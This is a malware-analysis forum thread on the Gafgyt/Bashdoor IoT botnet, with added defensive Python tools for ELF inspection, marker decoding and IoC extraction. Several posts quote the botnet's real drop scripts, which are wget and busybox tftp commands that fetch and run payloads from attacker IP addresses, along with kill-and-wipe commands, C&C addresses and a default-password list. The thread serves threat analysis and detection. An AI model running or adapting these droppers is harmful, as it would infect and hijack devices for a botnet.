A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24098  by unixfreaxjp
 Thu Oct 09, 2014 3:50 am
aaSSfxxx wrote: forgot to link to the post I was talking about, so here it is: http://www.kernelmode.info/forum/viewto ... 505#p23989
If I may say: in most malware built in NIX they might compile it right, so yes, the trace is in there and can be used for sig-building. But using gcc/libc sigs as a pattern is very easily "evadable", e.g.: (1) exploit-based/shellcode malware, which by nature does not use them, and (2) the infamous object stripping.

I assume this is the file in question:
Code:
$ md5 apache
MD5 (apache) = 371b8b20d4dd207f7b3f61bb30a7cb22
$ file apache
apache: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.18, stripped
There are 25 section headers starting from 0x83364, and no ".comment" among them, so there is no way to find the GCC version; it is stripped off. PoC:
Code:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .note.ABI-tag     NOTE            080480d4 0000d4 000020 00   A  0   0  4
  [ 2] .rel.plt          REL             08048118 000118 000008 08   A  0   4  4
  [ 3] .init             PROGBITS        08048120 000120 000030 00  AX  0   0  4
  [ 4] .plt              PROGBITS        08048150 000150 000010 00  AX  0   0  4
  [ 5] .text             PROGBITS        08048160 000160 0641ac 00  AX  0   0 16
  [ 6] __libc_freeres_fn PROGBITS        080ac310 064310 000af7 00  AX  0   0 16
  [ 7] .fini             PROGBITS        080ace08 064e08 00001c 00  AX  0   0  4
  [ 8] .rodata           PROGBITS        080ace40 064e40 01885c 00   A  0   0 32
  [ 9] __libc_atexit     PROGBITS        080c569c 07d69c 000004 00   A  0   0  4
  [10] __libc_subfreeres PROGBITS        080c56a0 07d6a0 000030 00   A  0   0  4
  [11] .eh_frame         PROGBITS        080c56d0 07d6d0 0051dc 00   A  0   0  4
  [12] .gcc_except_table PROGBITS        080ca8ac 0828ac 000120 00   A  0   0  1
  [13] .tdata            PROGBITS        080cb9cc 0829cc 000010 00 WAT  0   0  4
  [14] .tbss             NOBITS          080cb9dc 0829dc 00002c 00 WAT  0   0  4
  [15] .ctors            PROGBITS        080cb9dc 0829dc 00000c 00  WA  0   0  4
  [16] .dtors            PROGBITS        080cb9e8 0829e8 00000c 00  WA  0   0  4
  [17] .jcr              PROGBITS        080cb9f4 0829f4 000004 00  WA  0   0  4
  [18] .data.rel.ro      PROGBITS        080cb9f8 0829f8 00002c 00  WA  0   0  4
  [19] .got              PROGBITS        080cba24 082a24 000008 04  WA  0   0  4
  [20] .got.plt          PROGBITS        080cba2c 082a2c 000010 04  WA  0   0  4
  [21] .data             PROGBITS        080cba40 082a40 000840 00  WA  0   0 32
  [22] .bss              NOBITS          080cc280 083280 005c3c 00  WA  0   0 32
  [23] __libc_freeres_pt NOBITS          080d1ebc 083280 000018 00  WA  0   0  4
  [24] .shstrtab         STRTAB          00000000 083280 0000e4 00      0   0  1

 Section to Segment mapping:
   00     .note.ABI-tag .plt .init .text __libc_freeres_fn .fini .rodata __libc_atexit __libc_subfreeres .eh_frame .gcc_except_table
   01     .tdata .ctors .dtors .jcr .data.rel.ro .got .got.plt .data .bss __libc_freeres_ptrs
   02     .note.ABI-tag
   03     .tdata .tbss
It's a very basic NIX object-stripping command which (I think) most unixmen might know (I will NOT expose HOW here).
Another "hint" (based on my personal experience) as an effect of stripping: relocation section '.rel.plt' at offset 0x118 contains 1 odd entry. I found this similar "glitch" in some cases of object stripping (using a malware builder, non-standard, whatever they are using, etc.), but this might be caused by other reasons too.
Code:
Offset     Info    Type          Sym.Value
080cba38    0x02a   unrecognized: 2a
Point is: better use another vector for the sig. Rgds
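Added example (not code from the thread or from any of the tools used in it): a small ELF32 inspector that does what the post above does by hand. It lists the section names, reports whether a .comment section survived (that is where GCC leaves its version string, so its absence is the "no way to find the GCC version" situation), and decodes the .rel.plt entries by i386 relocation type number. One thing the decoder adds to the post: type 0x2a is R_386_IRELATIVE in glibc's elf.h, the relocation a statically linked glibc uses for IFUNC-resolved routines, so a lone entry of that type in a static i386 binary is expected from static linking and is not by itself evidence of stripping. The two ELF images at the bottom are constructed stand-ins for the 'apache' sample (same r_offset and r_info as in the post), not the sample itself.

```python
"""Added example: ELF32 LSB inspector for .comment presence and .rel.plt types.
Not code from the thread; the images at the bottom are constructed stand-ins."""
import struct

# i386 relocation type numbers as defined in glibc's elf.h.
R_386_TYPES = {
    0: "R_386_NONE", 1: "R_386_32", 2: "R_386_PC32", 6: "R_386_GLOB_DAT",
    7: "R_386_JMP_SLOT", 8: "R_386_RELATIVE", 42: "R_386_IRELATIVE",
}
SHT_PROGBITS, SHT_STRTAB, SHT_REL = 1, 3, 9
EHDR, SHDR, REL = "<16sHHIIIIIHHHHHH", "<10I", "<II"   # ELF32 little-endian layouts


def parse_elf32(data: bytes) -> dict:
    """Return section names, the GCC string from .comment (None if absent)
    and the decoded .rel.plt entries of an ELF32 LSB image."""
    if data[:4] != b"\x7fELF" or data[4] != 1 or data[5] != 1:
        raise ValueError("not an ELF32 little-endian image")
    hdr = struct.unpack_from(EHDR, data, 0)
    e_shoff, e_shentsize, e_shnum, e_shstrndx = hdr[6], hdr[11], hdr[12], hdr[13]
    shdrs = [struct.unpack_from(SHDR, data, e_shoff + i * e_shentsize)
             for i in range(e_shnum)]
    strtab_off = shdrs[e_shstrndx][4]             # sh_offset of .shstrtab

    def name(sh_name: int) -> str:
        start = strtab_off + sh_name
        return data[start:data.index(b"\0", start)].decode()

    sections = {}
    for sh in shdrs:
        sh_name, sh_type, _flags, _addr, sh_off, sh_size = sh[:6]
        if sh_name:                               # skip the mandatory NULL entry
            sections[name(sh_name)] = (sh_type, sh_off, sh_size)

    gcc = None
    if ".comment" in sections:
        _, off, size = sections[".comment"]
        # .comment holds NUL-separated strings; the toolchain one starts "GCC:".
        for s in data[off:off + size].split(b"\0"):
            if s.startswith(b"GCC:"):
                gcc = s.decode()

    relocs = []
    if ".rel.plt" in sections:
        sh_type, off, size = sections[".rel.plt"]
        if sh_type != SHT_REL:
            raise ValueError(".rel.plt is not an SHT_REL section")
        for i in range(size // 8):                # Elf32_Rel is 8 bytes
            r_offset, r_info = struct.unpack_from(REL, data, off + i * 8)
            sym, rtype = r_info >> 8, r_info & 0xFF
            relocs.append((r_offset, sym, R_386_TYPES.get(rtype, "unknown:%#x" % rtype)))
    return {"sections": list(sections), "gcc_comment": gcc, "rel_plt": relocs}


def build_elf32(sections: dict) -> bytes:
    """Assemble a minimal ELF32 LSB, EM_386 image from {name: (sh_type, bytes)}.
    Constructed for this example only; fields the parser never reads stay zero."""
    names = list(sections) + [".shstrtab"]
    shstr = b"\0" + b"".join(n.encode() + b"\0" for n in names)
    name_off, pos = {}, 1
    for n in names:
        name_off[n], pos = pos, pos + len(n) + 1
    contents = {n: sections[n][1] for n in sections}
    contents[".shstrtab"] = shstr
    body, offs = b"", {}
    for n in names:
        offs[n] = 52 + len(body)                  # data follows the 52-byte header
        body += contents[n]
    shoff = 52 + len(body)
    table = struct.pack(SHDR, *[0] * 10)          # index 0 must be the NULL header
    for n in names:
        sh_type = sections[n][0] if n in sections else SHT_STRTAB
        table += struct.pack(SHDR, name_off[n], sh_type, 0, 0, offs[n],
                             len(contents[n]), 0, 0, 1, 0)
    ident = b"\x7fELF\x01\x01\x01" + b"\0" * 9    # ELFCLASS32, ELFDATA2LSB, EV_CURRENT
    ehdr = struct.pack(EHDR, ident, 2, 3, 1, 0, 0, shoff, 0, 52, 32, 0, 40,
                       len(names) + 1, len(names))
    return ehdr + body + table


# Constructed stand-in for the stripped sample: no .comment, and one Elf32_Rel
# in .rel.plt with the same r_offset and r_info (0x2a) as in the post.
IRELATIVE_ENTRY = struct.pack(REL, 0x080CBA38, 0x2A)
STRIPPED = build_elf32({".text": (SHT_PROGBITS, b"\x90" * 16),
                        ".rel.plt": (SHT_REL, IRELATIVE_ENTRY)})
# Same image with the .comment section an unstripped GCC build would carry.
UNSTRIPPED = build_elf32({".text": (SHT_PROGBITS, b"\x90" * 16),
                          ".rel.plt": (SHT_REL, IRELATIVE_ENTRY),
                          ".comment": (SHT_PROGBITS, b"GCC: (GNU) 4.4.7\0")})

if __name__ == "__main__":
    for label, image in (("stripped", STRIPPED), ("unstripped", UNSTRIPPED)):
        r = parse_elf32(image)
        print(label, r["sections"], "gcc:", r["gcc_comment"], "rel.plt:", r["rel_plt"])
```

Feed it a real file with parse_elf32(open(path, "rb").read()). It handles only ELF32 little-endian with i386 relocation names, so the big-endian MIPS, PowerPC and SPARC bots and the x86-64 ones further down this thread would need the other header layouts, the ">" byte order and their own relocation tables.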
 #25423  by benkow_
 Mon Mar 09, 2015 10:37 pm
Hello,
Sorry for bumping this old thread, but I think here we are talking about Linux/Gafgyt.
New sample attached:
C&C 104.192.0.130:69
From hxxp://104.192.0.130/God/ -
bot-arm https://www.virustotal.com/fr/file/2f09 ... 425920322/
bot-m68k https://www.virustotal.com/fr/file/4e61 ... 425920268/
bot-mips https://www.virustotal.com/fr/file/0345 ... 425920644/
bot-mipsel https://www.virustotal.com/fr/file/c90a ... 425920727/
bot-powerpc https://www.virustotal.com/file/1e5d72b ... 425920729/
bot-sparc https://www.virustotal.com/file/ce701fa ... 425920268/
bot-x86 https://www.virustotal.com/fr/file/26ca ... 425920320/
The server binary: hxxp://104.192.0.130/server
https://www.virustotal.com/file/2a04c21 ... 425921008/

And... the source code of the server hxxp://104.192.0.130/server.c -> http://pastebin.com/vdWW47uk

attached
Attachments: infected (134.52 KiB)
 #25433  by sysopfb
 Tue Mar 10, 2015 11:53 pm
benkow_ wrote:Hello,
Sorry for bumping this old thread, but I think here we are talking about Linux/Gafgyt.
New sample attached:
C&C 104.192.0.130:69
From hxxp://104.192.0.130/God/ -
bot-arm https://www.virustotal.com/fr/file/2f09 ... 425920322/
bot-m68k https://www.virustotal.com/fr/file/4e61 ... 425920268/
bot-mips https://www.virustotal.com/fr/file/0345 ... 425920644/
bot-mipsel https://www.virustotal.com/fr/file/c90a ... 425920727/
bot-powerpc https://www.virustotal.com/file/1e5d72b ... 425920729/
bot-sparc https://www.virustotal.com/file/ce701fa ... 425920268/
bot-x86 https://www.virustotal.com/fr/file/26ca ... 425920320/
The server binary: hxxp://104.192.0.130/server
https://www.virustotal.com/file/2a04c21 ... 425921008/

And... the source code of the server hxxp://104.192.0.130/server.c -> http://pastebin.com/vdWW47uk

attached

104.192.0.130/pl
104.192.0.130/client
 #26372  by unixfreaxjp
 Sat Jul 25, 2015 11:57 am
Linux/Bash0day / Bashdoor
New one; the CNC was taken down. Strings to ID the threat:
Code:
0x0009560  DEFAULT
0x0009568  IP: %d.%d.%d.%d
0x000957A  8.8.8.8
0x0009582  /proc/net/route
0x0009592  	0x000	
0x000959D  /proc/cpuinfo
0x00095AB  BOGOMIPS
0x00095B7  /bin/sh
0x00095BF  all
0x00095C5  syn
0x00095C9  rst
0x00095CD  fin
0x00095D1  ack
0x00095D5  psh
0x00095D9  Invalid flag "%s"
0x00095EB  Failed opening raw socket.
0x0009606  Failed setting raw headers mode.
0x0009629  GET %s HTTP/1.0
0x000963A  Host: %s
0x0009644  Connection: close
0x000965A  %d.%d.%d.%d
0x0009666  PING
0x000966B  recv: %d, %s
0x0009678  self
0x0009680  /proc/
0x0009687  /cmdline
0x0009690  /proc
0x0009696  [ %s ] Starting new scan with [ %d ] sockets
0x00096C3  echo -e '\x67\x61\x79\x66\x67\x74'
0x00096E8  REPORT %s:%s:%s - Report Count: %d B: %s
0x0009711  cd /tmp || cd /var/run || cd /mnt;busybox\
 tftp 80.242.123.218 -c get bin3.sh;sh bin3.sh;\
busybox tftp -r bin2.sh -g 80.242.123.218; sh bin2.sh;\
busybox wget http://80.242.123.218:8080/bin.sh; \
sh bin.sh;echo -e '\x62\x69\x6e\x66\x61\x67\x74'
0x0009802  CURRENTSTATE
0x000980F  ipState: %d.%d.%d.%d
0x0009826  PONG!
0x000982C  GETLOCALIP
0x0009837  My IP: %s
0x0009841  TIMEOUT
0x0009849  TIMEOUT <time>
0x0009858  TIMEOUT = %d
0x0009865  SCANNER
0x000986D  SCANNER ON | OFF
0x000987E  EON
0x0009882  EOFF
0x0009887  DNS
0x000988B  HOLD
0x0009890  JUNK
0x0009895  JUNK <ip> <port> <time>
0x00098AD  UDP
0x00098B1  RANDOM
0x00098B8  TCP
0x00098BC  KILLATTK
0x00098C5  LOLNOGTFO
0x00098CF  ./libc
0x00098D6  ./mips
0x00098DD  ./x86_64
0x00098E6  ./arm
0x00098EC  ./mipsel
0x00098F5  BUILD %s
0x00098FE  PING %i
0x0009906  PONG %i
0x000990E  DUP
0x0009915  %s 2>&1
0x000991F  80.242.123.218:1981
0x0009933  root
0x000993A  admin
0x0009942  1234
0x0009949  12345
0x0009951  invalid
0x0009959  incorrect
0x0009963  fail
0x0009968  again
0x000996E  wrong
0x0009974  accessdenied
0x0009981  error
0x0009987  bad
0x000998B  success
0x0009993  busybox
0x000999B  shell
0x00099A1  dvrdvs
0x00099A8  user
0x00099AD  login
0x00099B3  pass
0x00099B8  name
0x00099BD  gayfgt
0x00099C4  binfagt
All are self-explanatory by reference to the first post of this repository and the strings above.
Cnc:
Code:
80.242.123.218
Sample: https://www.virustotal.com/en/file/9287 ... 437825078/
#MalwareMustDie
Attachments: 7z / infected (24.85 KiB)
 #26478  by unixfreaxjp
 Sun Aug 09, 2015 8:50 am
Code:
[0x0804d839]> !file *
set of attempts to infect multi-platform IoT:
10: ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
11: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
12: ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
13: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
14: ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
15: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
16: ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
17: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
[0x0804d839]> !md5 *
MD5 (10) = 1d2043c5ecdaa9ab0cebfd5cc9580245
MD5 (11) = ffce3977f72fb7181aebfd239dc910f8
MD5 (12) = 0aeac30ff8d74bc45d87e67fc803f78b
MD5 (13) = f5219266c28795528929d02c161368ab
MD5 (14) = 496972b9e4b2a9f104edb2eee00b3a3a
MD5 (15) = 568611d303e88c0cdc492c087bd9050a
MD5 (16) = 1cc27d8210c9d40cb74ab70c30c6f54a
MD5 (17) = 71b4513b846118f5b530a0ec88734712
[0x0804d839]>
source, thanks to @da_667
play dead...
installer:
Code:
rm -rf 10 11 12 13 14 15 16 17
cd /tmp && wget -q http://162.213.199.116/10 && chmod +x 10 && ./10
cd /tmp && wget -q http://162.213.199.116/11 && chmod +x 11 && ./11
cd /tmp && wget -q http://162.213.199.116/12 && chmod +x 12 && ./12
cd /tmp && wget -q http://162.213.199.116/13 && chmod +x 13 && ./13
cd /tmp && wget -q http://162.213.199.116/14 && chmod +x 14 && ./14
cd /tmp && wget -q http://162.213.199.116/15 && chmod +x 15 && ./15
cd /tmp && wget -q http://162.213.199.116/16 && chmod +x 16 && ./16
cd /tmp && wget -q http://162.213.199.116/17 && chmod +x 17 && ./17
CNC pointed to the infection source.
Seems to be the previous code (ref: http://www.kernelmode.info/forum/viewto ... 505#p23988 ):
Code:
0000000267F0  bin/busybox;echo -e '\147\141\171\146\147\164
Attachments: 7z/infected (302.23 KiB)
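Added example (not code from the thread and not the bot's own code): a decoder for the `echo -e` escape sequences the bot uses for its marker strings. The July strings dump above carries the marker both escaped (`echo -e '\x67\x61\x79\x66\x67\x74'` and `'\x62\x69\x6e\x66\x61\x67\x74'`) and in plaintext (`gayfgt` at 0x99BD, `binfagt` at 0x99C4), and the August sample spells the same marker in octal (`'\147\141\171\146\147\164'`). A grep for the plaintext misses the escaped form on the wire or in a dropper, so the example decodes the argument the way bash's builtin echo -e does (\xHH, \0NNN and \NNN octal, plus the single-letter escapes) and then matches. KNOWN_MARKERS holds the two plaintext strings from the dump; SAMPLE is assembled from the three occurrences quoted in the posts, including the truncated octal one.

```python
"""Added example: decode echo -e escapes and match the bot's marker strings.
Not code from the thread; SAMPLE is assembled from lines quoted in the posts."""
import re

ESCAPE_RE = re.compile(
    r"\\(?:x([0-9A-Fa-f]{1,2})"        # \xHH   (one or two hex digits)
    r"|0([0-7]{0,3})"                   # \0NNN  (zero to three octal digits)
    r"|([1-7][0-7]{0,2})"               # \NNN   (one to three octal digits)
    r"|([abefnrtv\\]))"                 # \n, \t, \\ and friends
)
SIMPLE = {"a": 7, "b": 8, "e": 27, "f": 12, "n": 10, "r": 13, "t": 9, "v": 11, "\\": 92}


def decode_echo_e(arg: str) -> bytes:
    """Turn the argument of `echo -e '...'` into the bytes that reach the terminal."""
    out, pos = bytearray(), 0
    for m in ESCAPE_RE.finditer(arg):
        out += arg[pos:m.start()].encode("latin-1")
        hx, oct0, octn, simple = m.groups()
        if hx is not None:
            out.append(int(hx, 16))
        elif oct0 is not None:
            out.append(int(oct0, 8) & 0xFF if oct0 else 0)
        elif octn is not None:
            out.append(int(octn, 8) & 0xFF)
        else:
            out.append(SIMPLE[simple])
        pos = m.end()
    out += arg[pos:].encode("latin-1")
    return bytes(out)


# Plaintext marker strings that appear as-is in the July strings dump.
KNOWN_MARKERS = {b"gayfgt", b"binfagt"}
# Tolerate a missing closing quote: the August post's line is cut off.
ECHO_RE = re.compile(r"echo\s+-e\s+'([^'\n]*)'?")


def find_echo_markers(text: str) -> list:
    """Find every echo -e '...' in a command line or strings dump and report
    (escaped form, decoded bytes, whether it is a known marker)."""
    hits = []
    for m in ECHO_RE.finditer(text):
        decoded = decode_echo_e(m.group(1))
        hits.append((m.group(1), decoded, decoded in KNOWN_MARKERS))
    return hits


# Constructed from the three echo -e occurrences quoted in the posts above.
SAMPLE = r"""echo -e '\x67\x61\x79\x66\x67\x74'
cd /tmp || cd /var/run || cd /mnt;busybox tftp 80.242.123.218 -c get bin3.sh;sh bin3.sh;busybox tftp -r bin2.sh -g 80.242.123.218; sh bin2.sh;busybox wget http://80.242.123.218:8080/bin.sh; sh bin.sh;echo -e '\x62\x69\x6e\x66\x61\x67\x74'
bin/busybox;echo -e '\147\141\171\146\147\164
"""

if __name__ == "__main__":
    for escaped, decoded, known in find_echo_markers(SAMPLE):
        print(f"{escaped!r:45} -> {decoded!r:12} {'known marker' if known else 'unknown'}")
```

Run the same decoder over captured telnet sessions or honeypot command logs before matching; the escaped spelling changes from build to build (hex in July, octal in August) while the decoded marker stays the same.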
 #26497  by tWiCe
 Tue Aug 11, 2015 2:25 pm
Dropped SH script:
Code:
killall -9 1
killall -9 2
killall -9 3
killall -9 4
killall -9 5
killall -9 6
killall -9 7
killall -9 8
killall -9 9
killall -9 10
killall -9 11
killall -9 12
killall -9 14
killall -9 15
killall -9 16
killall -9 mips
killall -9 mipsel
killall -9 sh4
killall -9 ppc
killall -9 x86_64
killall -9 armv5l
killall -9 i686
killall -9 armv6l
killall -9 armv4l

rm -rf 1 2 3 4 5 6 7 8 9 10 11 12 14 15 16 17 c1 c2 c3 c4 c5 c6 c7 c8 c9 c10 c11 c12 c14 c15 c16 c17
cd /tmp && wget -q http://192.3.207.242/c1 && chmod +x c1 && ./c1
cd /tmp && wget -q http://192.3.207.242/c2 && chmod +x c2 && ./c2
cd /tmp && wget -q http://192.3.207.242/c3 && chmod +x c3 && ./c3
cd /tmp && wget -q http://192.3.207.242/c4 && chmod +x c4 && ./c4
cd /tmp && wget -q http://192.3.207.242/c5 && chmod +x c5 && ./c5
cd /tmp && wget -q http://192.3.207.242/c6 && chmod +x c6 && ./c6
cd /tmp && wget -q http://192.3.207.242/c7 && chmod +x c7 && ./c7
cd /tmp && wget -q http://192.3.207.242/c8 && chmod +x c8 && ./c8
cd /tmp && wget -q http://192.3.207.242/c9 && chmod +x c9 && ./c9
cd /tmp && wget -q http://192.3.207.242/c10 && chmod +x c10 && ./c10
cd /tmp && wget -q http://192.3.207.242/c11 && chmod +x c11 && ./c11
cd /tmp && wget -q http://192.3.207.242/c12 && chmod +x c12 && ./c12
cd /tmp && wget -q http://192.3.207.242/c14 && chmod +x c14 && ./c14
cd /tmp && wget -q http://192.3.207.242/c15 && chmod +x c15 && ./c15
cd /tmp && wget -q http://192.3.207.242/c16 && chmod +x c16 && ./c16
cd /tmp && wget -q http://192.3.207.242/c17 && chmod +x c17 && ./c17
rm -rf *
Samples attached.
Attachments: infected (518.47 KiB)
 #26635  by shibumi
 Tue Sep 01, 2015 9:35 am
Hello,
I've found a new method for spreading bash0day alias shellshock alias bashdoor alias gayfgt.

They are using a 'shotgun' approach now.

First they are bruteforcing SSH. Then they are downloading .d.sh via wget and executing it.
Code:
# Filename .d.sh 
rm -rf .a .b .c .d .e .f .g .h .i .j
cd /tmp && wget -q http://192.187.101.74/.a && chmod +x .a && ./.a
cd /tmp && wget -q http://192.187.101.74/.b && chmod +x .b && ./.b
cd /tmp && wget -q http://192.187.101.74/.c && chmod +x .c && ./.c
cd /tmp && wget -q http://192.187.101.74/.d && chmod +x .d && ./.d
cd /tmp && wget -q http://192.187.101.74/.e && chmod +x .e && ./.e
cd /tmp && wget -q http://192.187.101.74/.f && chmod +x .f && ./.f
cd /tmp && wget -q http://192.187.101.74/.g && chmod +x .g && ./.g
cd /tmp && wget -q http://192.187.101.74/.h && chmod +x .h && ./.h
cd /tmp && wget -q http://192.187.101.74/.i && chmod +x .i && ./.i
cd /tmp && wget -q http://192.187.101.74/.j && chmod +x .j && ./.j
The binaries are named from '.a' to '.j' and have been compiled for different architectures:
Code:
a:                    ELF 32-bit LSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
b:                    ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, not stripped
c:                    ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, not stripped
d:                    ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, not stripped
e:                    ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, not stripped
f:                    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
g:                    ELF 32-bit MSB executable, PowerPC or cisco 4500, version 1 (SYSV), statically linked, not stripped
h:                    ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, not stripped
i:                    ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, not stripped
j:                    ELF 32-bit MSB executable, SPARC, version 1 (SYSV), dynamically linked, interpreter /lib/ld-uClibc.so.0, not stripped
I never saw the Motorola m68k and Renesas SuperH architectures before.

Some whois information about the host:
Code:
OriginAS:       AS33387
City:           North Kansas City
StateProv:      MO
PostalCode:     64116
Country:        US
Little hint: I've seen the same approach while spreading the SID IRC-Bot from a host in Turkey. I will edit this post later and post the link to it here.
Attachments: infected (372.78 KiB)
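Added example (not code from the thread): an IOC extractor for the drop scripts quoted in the posts above, i.e. the numbered, c-numbered and dotted wget loops and the busybox tftp/wget one-liner from the July strings dump. It splits a script into individual shell commands and pulls out the download hosts, the file names dropped, which of them were executed, the process names passed to killall (in the c1..c17 script those are the names the earlier drops used, 10..17, mips, mipsel, sh4 and so on, so they double as a hunt list for older variants), the working directories tried, whether the script ends with `rm -rf *`, and whether several payloads came from one host, which is the multi-arch "shotgun" pattern this thread keeps seeing. Both inputs at the bottom are constructed: SAMPLE_SCRIPT is an abbreviated copy of the c1..c17 script with three payloads and ONELINER is the command from the strings dump.

```python
"""Added example: pull IOCs out of a Gafgyt-style drop script.
Not code from the thread; the two inputs at the bottom are constructed."""
import re
from collections import Counter

SPLIT_RE = re.compile(r"\s*(?:;|&&|\|\||\n)\s*")        # one shell command per item
URL_RE = re.compile(r"https?://([\w.\-]+)(?::\d+)?/([^\s;&|'\"]*)")
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
TFTP_FILE_RE = re.compile(r"(?:-r|get)\s+(\S+)")          # busybox tftp -r F / -c get F
KILL_RE = re.compile(r"killall\s+(?:-\S+\s+)*(\S+)$")
EXEC_RE = re.compile(r"(?:\./|sh\s+)([\w.\-]+)$")         # ./payload  or  sh payload.sh
RM_STAR_RE = re.compile(r"rm\s+-rf\s+\*$")


def parse_dropper(script: str) -> dict:
    """Extract download hosts, dropped file names, executed payloads, killed
    process names and working directories from a drop script."""
    hosts, downloads, executed, killed, workdirs = Counter(), [], [], [], []
    wipes = False
    for cmd in (c.strip() for c in SPLIT_RE.split(script)):
        if not cmd:
            continue
        m_kill, m_url, m_exec = KILL_RE.match(cmd), URL_RE.search(cmd), EXEC_RE.match(cmd)
        if cmd.startswith("cd "):
            workdirs.append(cmd.split()[1])
        elif m_kill:
            killed.append(m_kill.group(1))
        elif m_url:                                       # wget / busybox wget
            host, path = m_url.groups()
            hosts[host] += 1
            downloads.append((host, path.rsplit("/", 1)[-1]))
        elif "tftp" in cmd.split():                       # busybox tftp <ip> ... / -g <ip>
            ip, f = IP_RE.search(cmd), TFTP_FILE_RE.search(cmd)
            if ip:
                hosts[ip.group()] += 1
                downloads.append((ip.group(), f.group(1) if f else None))
        elif m_exec:
            executed.append(m_exec.group(1))
        elif RM_STAR_RE.match(cmd):
            wipes = True
    return {
        "hosts": dict(hosts),
        "downloads": downloads,
        "executed": executed,
        "killed": killed,
        "workdirs": sorted(set(workdirs)),
        "wipes_workdir": wipes,          # 'rm -rf *' after running: removes the evidence
        # several payloads from one host = the multi-arch "shotgun" drop in the posts
        "shotgun": any(n >= 3 for n in hosts.values()),
    }


# Constructed: abbreviated copy of the c1..c17 script from the thread.
SAMPLE_SCRIPT = """\
killall -9 mips
killall -9 mipsel
killall -9 sh4
rm -rf c1 c2 c3
cd /tmp && wget -q http://192.3.207.242/c1 && chmod +x c1 && ./c1
cd /tmp && wget -q http://192.3.207.242/c2 && chmod +x c2 && ./c2
cd /tmp && wget -q http://192.3.207.242/c3 && chmod +x c3 && ./c3
rm -rf *
"""
# Constructed: the install command from the July strings dump, on one line.
ONELINER = (r"cd /tmp || cd /var/run || cd /mnt;busybox tftp 80.242.123.218 -c get bin3.sh;"
            r"sh bin3.sh;busybox tftp -r bin2.sh -g 80.242.123.218; sh bin2.sh;"
            r"busybox wget http://80.242.123.218:8080/bin.sh; sh bin.sh;"
            r"echo -e '\x62\x69\x6e\x66\x61\x67\x74'")

if __name__ == "__main__":
    for label, text in (("c1..c3 script", SAMPLE_SCRIPT), ("strings one-liner", ONELINER)):
        r = parse_dropper(text)
        print(label, "hosts:", r["hosts"], "shotgun:", r["shotgun"],
              "files:", [f for _, f in r["downloads"]], "killed:", r["killed"])
```

The "hosts" dict is the block list, "downloads" gives the names to look for under the "workdirs" on a suspect box, and "killed" plus "executed" together are the process names to hunt for; "wipes_workdir" tells you in advance that the dropped files will be gone from /tmp and that process memory or the still-running binary is where to recover them.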